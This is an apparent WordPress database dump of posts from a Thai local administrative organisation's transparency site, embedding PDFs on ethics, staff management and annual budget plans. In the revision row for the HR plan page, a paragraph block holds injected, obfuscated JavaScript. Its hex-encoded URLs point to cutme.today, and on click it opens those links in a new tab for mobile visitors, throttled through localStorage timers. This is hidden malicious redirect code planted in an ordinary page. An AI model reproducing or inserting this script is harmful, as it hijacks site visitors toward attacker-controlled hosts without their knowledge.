(1752,1,'2025-07-07 15:05:29','2025-07-07 08:05:29','<!-- wp:image {\"id\":1750,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/tham-1024x256.png\" alt=\"\" class=\"wp-image-1750\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:file {\"id\":1503,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ประมวลจริยธรรมและการขับเคลื่อนจริยธรรม.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ประมวลจริยธรรมและการขับเคลื่อนจริยธรรม.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ประมวลจริยธรรมและการขับเคลื่อนจริยธรรม\"></object><a id=\"wp-block-file--media-675dff9d-2979-4636-9d91-1a668135f1a0\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ประมวลจริยธรรมและการขับเคลื่อนจริยธรรม.pdf\">ประมวลจริยธรรมและการขับเคลื่อนจริยธรรม</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ประมวลจริยธรรมและการขับเคลื่อนจริยธรรม.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-675dff9d-2979-4636-9d91-1a668135f1a0\">Download</a></div>\n<!-- /wp:file -->','ประมวลจริยธรรมและการขับเคลื่อนจริยธรรม','','inherit','closed','closed','','1502-revision-v1','','','2025-07-07 15:05:29','2025-07-07 08:05:29','',1502,'http://pakhaeng.ssk.in.th/?p=1752',0,'revision','',0),
(1753,1,'2025-07-07 15:06:07','2025-07-07 08:06:07','<!-- wp:image {\"id\":1748,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/Human-1024x256.png\" alt=\"\" class=\"wp-image-1748\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:file {\"id\":1499,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/การบริหารและพัฒนาทรัพยากรบุคคล.pdf\",\"displayPreview\":true,\"previewHeight\":800} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/การบริหารและพัฒนาทรัพยากรบุคคล.pdf\" type=\"application/pdf\" style=\"width:100%;height:800px\" aria-label=\"การบริหารและพัฒนาทรัพยากรบุคคล\"></object><a id=\"wp-block-file--media-00124d1a-79ba-4db0-be25-eed8c6e99073\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/การบริหารและพัฒนาทรัพยากรบุคคล.pdf\">การบริหารและพัฒนาทรัพยากรบุคคล</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/การบริหารและพัฒนาทรัพยากรบุคคล.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-00124d1a-79ba-4db0-be25-eed8c6e99073\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:paragraph -->\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>\n<!-- /wp:paragraph -->','แผนการบริหารและพัฒนาทรัพยากรบุคคล','','inherit','closed','closed','','566-revision-v1','','','2025-07-07 15:06:07','2025-07-07 08:06:07','',566,'http://pakhaeng.ssk.in.th/?p=1753',0,'revision','',0),
(1754,1,'2025-07-08 10:56:02','2025-07-08 03:56:02','<!-- wp:image {\"id\":1760,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/Screenshot-2025-07-08-113208-1024x256.png\" alt=\"\" class=\"wp-image-1760\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:file {\"id\":1755,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี\"></object><a id=\"wp-block-file--media-817e6856-41f6-43a9-a522-123e90295a52\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี.pdf\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-817e6856-41f6-43a9-a522-123e90295a52\">Download</a></div>\n<!-- /wp:file -->','แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี','','publish','closed','closed','','%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%81%e0%b9%89','','','2025-07-08 11:42:42','2025-07-08 04:42:42','',0,'http://pakhaeng.ssk.in.th/?page_id=1754',0,'page','',0),
(1755,1,'2025-07-08 10:50:26','2025-07-08 03:50:26','','แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี','','inherit','','closed','','%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%81%e0%b9%89','','','2025-07-08 10:50:26','2025-07-08 03:50:26','',1754,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี.pdf',0,'attachment','application/pdf',0),
(1756,1,'2025-07-08 10:56:02','2025-07-08 03:56:02','<!-- wp:file {\"id\":1755,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี\"></object><a id=\"wp-block-file--media-817e6856-41f6-43a9-a522-123e90295a52\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี.pdf\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-817e6856-41f6-43a9-a522-123e90295a52\">Download</a></div>\n<!-- /wp:file -->','แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี','','inherit','closed','closed','','1754-revision-v1','','','2025-07-08 10:56:02','2025-07-08 03:56:02','',1754,'http://pakhaeng.ssk.in.th/?p=1756',0,'revision','',0),
(1757,1,'2025-07-08 10:56:41','2025-07-08 03:56:41','<!-- wp:generateblocks/image {\"uniqueId\":\"285d6904\",\"mediaId\":1259,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-285d6904\"><img class=\"gb-image gb-image-285d6904\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/2025.png\" alt=\"\" title=\"2025\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"currentTab\":2,\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"#000000\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#f78da7\",\"titleBgHover\":\"#cf2e2e\",\"titleBgActive\":\"#cf2e2e\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#f78da7\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"cda4f9-0b\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tabcda4f9-0b\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_f98827-df\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_f98827-df kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_d803ff-d2\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_d803ff-d2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_921bc2-5c\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_921bc2-5c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469↗\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_77fcfe-f3\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_77fcfe-f3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_e9af1d-e0\",\"size\":16,\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_e9af1d-e0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\">ข่าวประชาสัมพันธ์</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"e71bc9-b1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tabe71bc9-b1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_8bd340-cd\",\"color\":\"#0693e3\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_8bd340-cd kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_eb7e47-e1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb7e47-e1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" 